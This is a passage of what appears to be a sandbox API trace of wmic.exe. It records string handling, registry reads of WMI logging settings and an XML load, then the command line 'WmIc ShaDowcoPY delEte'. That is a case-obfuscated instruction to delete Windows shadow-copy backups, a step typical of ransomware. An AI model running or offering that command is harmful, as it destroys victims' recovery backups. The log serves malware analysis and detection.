returned 0x572860 [0085.317] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0085.317] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0085.317] free (_Block=0x573fb8) [0085.317] free (_Block=0x573fd0) [0085.317] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76d30000 [0085.318] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0085.318] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.319] FreeLibrary (hLibModule=0x76d30000) returned 1 [0085.319] free (_Block=0x572860) [0085.319] _vsnwprintf (in: _Buffer=0x572818, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x25f8e0 | out: _Buffer="ms_409") returned 6 [0085.319] malloc (_Size=0x20) returned 0x573fb8 [0085.319] GetComputerNameW (in: lpBuffer=0x573fb8, nSize=0x25f938 | out: lpBuffer="XDUWTFONO", nSize=0x25f938) returned 1 [0085.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.319] malloc (_Size=0x14) returned 0x572860 [0085.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.319] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x25f974 | out: lpNameBuffer=0x0, nSize=0x25f974) returned 0x0 [0085.320] GetLastError () returned 0xea [0085.320] malloc (_Size=0x40) returned 0x572880 [0085.320] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x572880, nSize=0x25f974 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25f974) returned 0x1 [0085.321] lstrlenW (lpString="") returned 0 [0085.321] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0085.323] lstrlenW (lpString=".") returned 1 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0085.323] lstrlenW (lpString="LOCALHOST") returned 9 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0085.323] free (_Block=0x572860) [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] malloc (_Size=0x14) returned 0x572860 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] malloc (_Size=0x14) returned 0x5728c8 [0085.323] lstrlenW (lpString="XDUWTFONO") returned 9 [0085.323] malloc (_Size=0x4) returned 0x5728e8 [0085.323] malloc (_Size=0xc) returned 0x5728f8 [0085.323] malloc (_Size=0x18) returned 0x572910 [0085.323] malloc (_Size=0xc) returned 0x572930 [0085.323] SysStringLen (param_1="IDENTIFY") returned 0x8 [0085.323] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0085.323] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0085.323] SysStringLen (param_1="IDENTIFY") returned 0x8 [0085.323] malloc (_Size=0x18) returned 0x572948 [0085.323] malloc (_Size=0xc) returned 0x572968 [0085.324] SysStringLen (param_1="IMPERSONATE") returned 0xb [0085.324] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0085.324] SysStringLen (param_1="IMPERSONATE") returned 0xb [0085.324] SysStringLen (param_1="IDENTIFY") returned 0x8 [0085.324] SysStringLen (param_1="IDENTIFY") returned 0x8 [0085.324] SysStringLen (param_1="IMPERSONATE") returned 0xb [0085.324] malloc (_Size=0x18) returned 0x572980 [0085.324] malloc (_Size=0xc) returned 0x5729a0 [0085.324] SysStringLen (param_1="DELEGATE") returned 0x8 [0085.324] SysStringLen (param_1="IDENTIFY") returned 0x8 [0085.324] SysStringLen (param_1="DELEGATE") returned 0x8 [0085.324] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0085.324] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0085.324] SysStringLen (param_1="DELEGATE") returned 0x8 [0085.324] malloc (_Size=0x18) returned 0x5729b8 [0085.324] malloc (_Size=0xc) returned 0x5729d8 [0085.324] malloc (_Size=0x18) returned 0x5729f0 [0085.324] malloc (_Size=0xc) returned 0x572a10 [0085.324] SysStringLen (param_1="NONE") returned 0x4 [0085.324] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.324] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.324] SysStringLen (param_1="NONE") returned 0x4 [0085.324] malloc (_Size=0x18) returned 0x572a28 [0085.325] malloc (_Size=0xc) returned 0x572a48 [0085.325] SysStringLen (param_1="CONNECT") returned 0x7 [0085.326] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.326] malloc (_Size=0x18) returned 0x572a60 [0085.326] malloc (_Size=0xc) returned 0x572a80 [0085.326] SysStringLen (param_1="CALL") returned 0x4 [0085.326] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.326] SysStringLen (param_1="CALL") returned 0x4 [0085.326] SysStringLen (param_1="CONNECT") returned 0x7 [0085.326] malloc (_Size=0x18) returned 0x57e868 [0085.326] malloc (_Size=0xc) returned 0x572e98 [0085.326] SysStringLen (param_1="PKT") returned 0x3 [0085.326] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.326] SysStringLen (param_1="PKT") returned 0x3 [0085.326] SysStringLen (param_1="NONE") returned 0x4 [0085.326] SysStringLen (param_1="NONE") returned 0x4 [0085.326] SysStringLen (param_1="PKT") returned 0x3 [0085.326] malloc (_Size=0x18) returned 0x57e888 [0085.326] malloc (_Size=0xc) returned 0x572eb0 [0085.326] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.326] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.326] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.326] SysStringLen (param_1="NONE") returned 0x4 [0085.326] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.326] SysStringLen (param_1="PKT") returned 0x3 [0085.326] SysStringLen (param_1="PKT") returned 0x3 [0085.326] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.326] malloc (_Size=0x18) returned 0x57e8a8 [0085.327] malloc (_Size=0xc) returned 0x572ec8 [0085.327] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0085.327] SysStringLen (param_1="DEFAULT") returned 0x7 [0085.327] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0085.327] SysStringLen (param_1="PKT") returned 0x3 [0085.327] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0085.327] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.327] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0085.327] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0085.327] malloc (_Size=0x18) returned 0x57e8c8 [0085.327] malloc (_Size=0x40) returned 0x572ee0 [0085.327] malloc (_Size=0x20a) returned 0x572f28 [0085.327] GetSystemDirectoryW (in: lpBuffer=0x572f28, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0085.327] free (_Block=0x572f28) [0085.327] malloc (_Size=0xc) returned 0x572f28 [0085.327] malloc (_Size=0xc) returned 0x572f40 [0085.327] malloc (_Size=0xc) returned 0x572f58 [0085.327] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0085.327] SysStringLen (param_1="\\wbem\\") returned 0x6 [0085.327] free (_Block=0x572f28) [0085.327] free (_Block=0x572f40) [0085.327] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0085.328] free (_Block=0x572f58) [0085.328] malloc (_Size=0xc) returned 0x572f28 [0085.328] malloc (_Size=0xc) returned 0x572f40 [0085.328] malloc (_Size=0xc) returned 0x572f58 [0085.328] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0085.328] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0085.328] free (_Block=0x572f28) [0085.328] free (_Block=0x572f40) [0085.328] GetCurrentThreadId () returned 0x79c [0085.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x25f490 | out: phkResult=0x25f490*=0x10c) returned 0x0 [0085.328] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x25f49c, lpcbData=0x25f498*=0x400 | out: lpType=0x0, lpData=0x25f49c*=0x30, lpcbData=0x25f498*=0x4) returned 0x0 [0085.328] _wcsicmp (_String1="0", _String2="1") returned -1 [0085.328] _wcsicmp (_String1="0", _String2="2") returned -2 [0085.328] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x25f498*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x25f498*=0x42) returned 0x0 [0085.328] malloc (_Size=0x86) returned 0x572f70 [0085.329] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x572f70, lpcbData=0x25f498*=0x42 | out: lpType=0x0, lpData=0x572f70*=0x25, lpcbData=0x25f498*=0x42) returned 0x0 [0085.329] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0085.329] malloc (_Size=0x42) returned 0x573000 [0085.329] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0085.329] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x25f49c, lpcbData=0x25f498*=0x400 | out: lpType=0x0, lpData=0x25f49c*=0x36, lpcbData=0x25f498*=0xc) returned 0x0 [0085.329] _wtol (_String="65536") returned 65536 [0085.329] free (_Block=0x572f70) [0085.329] RegCloseKey (hKey=0x0) returned 0x6 [0085.329] CoCreateInstance (in: rclsid=0x6d6d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d6d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x25f92c | out: ppv=0x25f92c*=0x2214630) returned 0x0 [0086.566] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x2214630, xmlSource=0x25f8b0*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x77c7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x25f914 | out: isSuccessful=0x25f914*=0xffff) returned 0x0 [0088.834] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2214630, DOMElement=0x25f928 | out: DOMElement=0x25f928) returned 0x0 [0088.834] malloc (_Size=0xc) returned 0x572f28 [0088.835] free (_Block=0x572f28) [0088.835] malloc (_Size=0xc) returned 0x572f28 [0088.835] free (_Block=0x572f28) [0088.835] malloc (_Size=0xc) returned 0x572f28 [0088.836] malloc (_Size=0xc) returned 0x572f40 [0088.836] malloc (_Size=0x18) returned 0x57e8e8 [0088.836] malloc (_Size=0xc) returned 0x573160 [0088.836] free (_Block=0x573160) [0088.836] malloc (_Size=0xc) returned 0x573160 [0088.836] malloc (_Size=0xc) returned 0x573178 [0088.837] SysStringLen (param_1="VALUE") returned 0x5 [0088.837] SysStringLen (param_1="TABLE") returned 0x5 [0088.837] SysStringLen (param_1="TABLE") returned 0x5 [0088.837] SysStringLen (param_1="VALUE") returned 0x5 [0088.837] malloc (_Size=0x18) returned 0x57e908 [0088.837] malloc (_Size=0xc) returned 0x573190 [0088.838] free (_Block=0x573190) [0088.838] malloc (_Size=0xc) returned 0x57fac8 [0088.838] malloc (_Size=0xc) returned 0x57fae0 [0088.838] SysStringLen (param_1="LIST") returned 0x4 [0088.838] SysStringLen (param_1="TABLE") returned 0x5 [0088.838] malloc (_Size=0x18) returned 0x57e928 [0088.838] malloc (_Size=0xc) returned 0x57faf8 [0088.839] free (_Block=0x57faf8) [0088.839] malloc (_Size=0xc) returned 0x57faf8 [0088.839] malloc (_Size=0xc) returned 0x57fb10 [0088.839] SysStringLen (param_1="RAWXML") returned 0x6 [0088.839] SysStringLen (param_1="TABLE") returned 0x5 [0088.839] SysStringLen (param_1="RAWXML") returned 0x6 [0088.839] SysStringLen (param_1="LIST") returned 0x4 [0088.839] SysStringLen (param_1="LIST") returned 0x4 [0088.839] SysStringLen (param_1="RAWXML") returned 0x6 [0088.839] malloc (_Size=0x18) returned 0x57e948 [0088.839] malloc (_Size=0xc) returned 0x57fb28 [0088.840] free (_Block=0x57fb28) [0088.840] malloc (_Size=0xc) returned 0x57fb28 [0088.840] malloc (_Size=0xc) returned 0x57fb40 [0088.840] SysStringLen (param_1="HTABLE") returned 0x6 [0088.840] SysStringLen (param_1="TABLE") returned 0x5 [0088.840] SysStringLen (param_1="HTABLE") returned 0x6 [0088.840] SysStringLen (param_1="LIST") returned 0x4 [0088.840] malloc (_Size=0x18) returned 0x57e968 [0088.840] malloc (_Size=0xc) returned 0x57fb58 [0088.841] free (_Block=0x57fb58) [0088.841] malloc (_Size=0xc) returned 0x57fb58 [0088.841] malloc (_Size=0xc) returned 0x57fb70 [0088.841] SysStringLen (param_1="HFORM") returned 0x5 [0088.841] SysStringLen (param_1="TABLE") returned 0x5 [0088.841] SysStringLen (param_1="HFORM") returned 0x5 [0088.841] SysStringLen (param_1="LIST") returned 0x4 [0088.841] SysStringLen (param_1="HFORM") returned 0x5 [0088.841] SysStringLen (param_1="HTABLE") returned 0x6 [0088.841] malloc (_Size=0x18) returned 0x57e988 [0088.842] malloc (_Size=0xc) returned 0x57fb88 [0088.842] free (_Block=0x57fb88) [0088.842] malloc (_Size=0xc) returned 0x57fb88 [0088.842] malloc (_Size=0xc) returned 0x57fba0 [0088.842] SysStringLen (param_1="XML") returned 0x3 [0088.842] SysStringLen (param_1="TABLE") returned 0x5 [0088.842] SysStringLen (param_1="XML") returned 0x3 [0088.842] SysStringLen (param_1="VALUE") returned 0x5 [0088.842] SysStringLen (param_1="VALUE") returned 0x5 [0088.842] SysStringLen (param_1="XML") returned 0x3 [0088.842] malloc (_Size=0x18) returned 0x57e9a8 [0088.843] malloc (_Size=0xc) returned 0x57fbb8 [0088.843] free (_Block=0x57fbb8) [0088.843] malloc (_Size=0xc) returned 0x57fbb8 [0088.843] malloc (_Size=0xc) returned 0x57fbd0 [0088.843] SysStringLen (param_1="MOF") returned 0x3 [0088.843] SysStringLen (param_1="TABLE") returned 0x5 [0088.843] SysStringLen (param_1="MOF") returned 0x3 [0088.843] SysStringLen (param_1="LIST") returned 0x4 [0088.843] SysStringLen (param_1="MOF") returned 0x3 [0088.843] SysStringLen (param_1="RAWXML") returned 0x6 [0088.844] SysStringLen (param_1="LIST") returned 0x4 [0088.844] SysStringLen (param_1="MOF") returned 0x3 [0088.844] malloc (_Size=0x18) returned 0x57e9c8 [0088.844] malloc (_Size=0xc) returned 0x57fbe8 [0088.844] free (_Block=0x57fbe8) [0088.844] malloc (_Size=0xc) returned 0x57fbe8 [0088.844] malloc (_Size=0xc) returned 0x57fc00 [0088.844] SysStringLen (param_1="CSV") returned 0x3 [0088.845] SysStringLen (param_1="TABLE") returned 0x5 [0088.845] SysStringLen (param_1="CSV") returned 0x3 [0088.845] SysStringLen (param_1="LIST") returned 0x4 [0088.845] SysStringLen (param_1="CSV") returned 0x3 [0088.845] SysStringLen (param_1="HTABLE") returned 0x6 [0088.845] SysStringLen (param_1="CSV") returned 0x3 [0088.845] SysStringLen (param_1="HFORM") returned 0x5 [0088.845] malloc (_Size=0x18) returned 0x57e9e8 [0088.845] malloc (_Size=0xc) returned 0x57fc18 [0088.845] free (_Block=0x57fc18) [0088.845] malloc (_Size=0xc) returned 0x57fc18 [0088.846] malloc (_Size=0xc) returned 0x57fc30 [0088.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.846] SysStringLen (param_1="TABLE") returned 0x5 [0088.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.846] SysStringLen (param_1="VALUE") returned 0x5 [0088.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.846] SysStringLen (param_1="XML") returned 0x3 [0088.846] SysStringLen (param_1="XML") returned 0x3 [0088.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.846] malloc (_Size=0x18) returned 0x57ea08 [0088.846] malloc (_Size=0xc) returned 0x57fc48 [0088.847] free (_Block=0x57fc48) [0088.847] malloc (_Size=0xc) returned 0x57fc48 [0088.847] malloc (_Size=0xc) returned 0x57fc60 [0088.847] SysStringLen (param_1="texttablewsys") returned 0xd [0088.847] SysStringLen (param_1="TABLE") returned 0x5 [0088.847] SysStringLen (param_1="texttablewsys") returned 0xd [0088.847] SysStringLen (param_1="XML") returned 0x3 [0088.847] SysStringLen (param_1="texttablewsys") returned 0xd [0088.847] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.847] SysStringLen (param_1="XML") returned 0x3 [0088.847] SysStringLen (param_1="texttablewsys") returned 0xd [0088.847] malloc (_Size=0x18) returned 0x57ea28 [0088.848] malloc (_Size=0xc) returned 0x57fc78 [0088.848] free (_Block=0x57fc78) [0088.848] malloc (_Size=0xc) returned 0x57fc78 [0088.848] malloc (_Size=0xc) returned 0x57fc90 [0088.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.848] SysStringLen (param_1="TABLE") returned 0x5 [0088.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.848] SysStringLen (param_1="XML") returned 0x3 [0088.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.848] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.848] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.848] malloc (_Size=0x18) returned 0x57ea48 [0088.849] malloc (_Size=0xc) returned 0x57fca8 [0088.849] free (_Block=0x57fca8) [0088.849] malloc (_Size=0xc) returned 0x57fca8 [0088.849] malloc (_Size=0xc) returned 0x57fcc0 [0088.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.849] SysStringLen (param_1="TABLE") returned 0x5 [0088.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.849] SysStringLen (param_1="XML") returned 0x3 [0088.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.849] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.849] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.849] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.849] malloc (_Size=0x18) returned 0x57ea68 [0088.881] malloc (_Size=0xc) returned 0x57fcd8 [0088.881] free (_Block=0x57fcd8) [0088.882] malloc (_Size=0xc) returned 0x57fcd8 [0088.882] malloc (_Size=0xc) returned 0x57fcf0 [0088.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.882] SysStringLen (param_1="TABLE") returned 0x5 [0088.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.882] SysStringLen (param_1="XML") returned 0x3 [0088.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.882] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.882] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.882] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.882] malloc (_Size=0x18) returned 0x57ea88 [0088.882] malloc (_Size=0xc) returned 0x57fd08 [0088.883] free (_Block=0x57fd08) [0088.883] malloc (_Size=0xc) returned 0x57fd08 [0088.883] malloc (_Size=0xc) returned 0x57fd20 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] SysStringLen (param_1="TABLE") returned 0x5 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] SysStringLen (param_1="XML") returned 0x3 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.883] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.883] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0088.883] malloc (_Size=0x18) returned 0x57eaa8 [0088.884] malloc (_Size=0xc) returned 0x57fd38 [0088.884] free (_Block=0x57fd38) [0088.884] malloc (_Size=0xc) returned 0x57fd38 [0088.884] malloc (_Size=0xc) returned 0x57fd50 [0088.884] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.884] SysStringLen (param_1="TABLE") returned 0x5 [0088.884] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.884] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.884] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.884] SysStringLen (param_1="XML") returned 0x3 [0088.884] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.884] SysStringLen (param_1="texttablewsys") returned 0xd [0088.884] SysStringLen (param_1="XML") returned 0x3 [0088.884] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.884] malloc (_Size=0x18) returned 0x57eac8 [0088.885] malloc (_Size=0xc) returned 0x57fd68 [0088.885] free (_Block=0x57fd68) [0088.885] malloc (_Size=0xc) returned 0x57fd68 [0088.885] malloc (_Size=0xc) returned 0x57fd80 [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] SysStringLen (param_1="TABLE") returned 0x5 [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] SysStringLen (param_1="XML") returned 0x3 [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] SysStringLen (param_1="texttablewsys") returned 0xd [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0088.885] SysStringLen (param_1="XML") returned 0x3 [0088.885] SysStringLen (param_1="htable-sortby") returned 0xd [0088.885] malloc (_Size=0x18) returned 0x57eae8 [0088.886] malloc (_Size=0xc) returned 0x57fd98 [0088.886] free (_Block=0x57fd98) [0088.886] malloc (_Size=0xc) returned 0x57fd98 [0088.886] malloc (_Size=0xc) returned 0x57fdb0 [0088.886] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.886] SysStringLen (param_1="TABLE") returned 0x5 [0088.886] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.886] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.886] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.886] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.886] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.886] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.886] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.886] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.886] malloc (_Size=0x18) returned 0x57eb08 [0088.887] malloc (_Size=0xc) returned 0x57fdc8 [0088.887] free (_Block=0x57fdc8) [0088.887] malloc (_Size=0xc) returned 0x57fdc8 [0088.887] malloc (_Size=0xc) returned 0x57fde0 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] SysStringLen (param_1="TABLE") returned 0x5 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0088.887] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.887] SysStringLen (param_1="wmiclimofformat") returned 0xf [0088.887] malloc (_Size=0x18) returned 0x57eb28 [0088.888] malloc (_Size=0xc) returned 0x57fdf8 [0088.888] free (_Block=0x57fdf8) [0088.888] malloc (_Size=0xc) returned 0x57fdf8 [0088.888] malloc (_Size=0xc) returned 0x57fe10 [0088.888] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.888] SysStringLen (param_1="TABLE") returned 0x5 [0088.888] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.888] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.888] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.888] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.888] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.888] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.888] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.888] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.888] malloc (_Size=0x18) returned 0x57eb48 [0088.889] malloc (_Size=0xc) returned 0x57fe28 [0088.889] free (_Block=0x57fe28) [0088.889] malloc (_Size=0xc) returned 0x57fe28 [0088.889] malloc (_Size=0xc) returned 0x57fe40 [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] SysStringLen (param_1="TABLE") returned 0x5 [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0088.889] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0088.889] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0088.889] malloc (_Size=0x18) returned 0x57eb68 [0088.890] FreeThreadedDOMDocument:IUnknown:Release (This=0x2214630) returned 0x0 [0088.890] free (_Block=0x572f58) [0088.890] GetCommandLineW () returned="WmIc ShaDowcoPY delEte" [0088.890] malloc (_Size=0x30) returned 0x573190 [0088.890] memcpy_s (in: _Destination=0x573190, _DestinationSize=0x2e, _Source=0x2c1976, _SourceSize=0x2e | out: _Destination=0x573190) returned 0x0 [0088.890] malloc (_Size=0xc) returned 0x57fe58 [0088.890] malloc (_Size=0xc) returned 0x57fe70 [0088.890] malloc (_Size=0xc) returned 0x57fe88 [0088.890] malloc (_Size=0xc) returned 0x2852060 [0088.890] malloc (_Size=0x80) returned 0x28505b0 [0088.890] GetLocalTime (in: lpSystemTime=0x25f8f0 | out: lpSystemTime=0x25f8f0*(wYear=0x7e4, wMonth=0x5, wDayOfWeek=0x2, wDay=0x5, wHour=0x6, wMinute=0x16, wSecond=0x37, wMilliseconds=0x370)) [0088.890] _vsnwprintf (in: _Buffer=0x28505b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x25f8d0 | out: _Buffer="05-05-2020T06:22:55") returned 19 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] malloc (_Size=0x28) returned 0x5731c8 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] malloc (_Size=0x28) returned 0x5731f8 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] malloc (_Size=0x16) returned 0x57eb88 [0088.891] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.891] _wcsicmp (_String1="ShaDowcoPY", _String2="\"NULL\"") returned 81 [0088.891] malloc (_Size=0x16) returned 0x57eba8 [0088.891] malloc (_Size=0x4) returned 0x573228 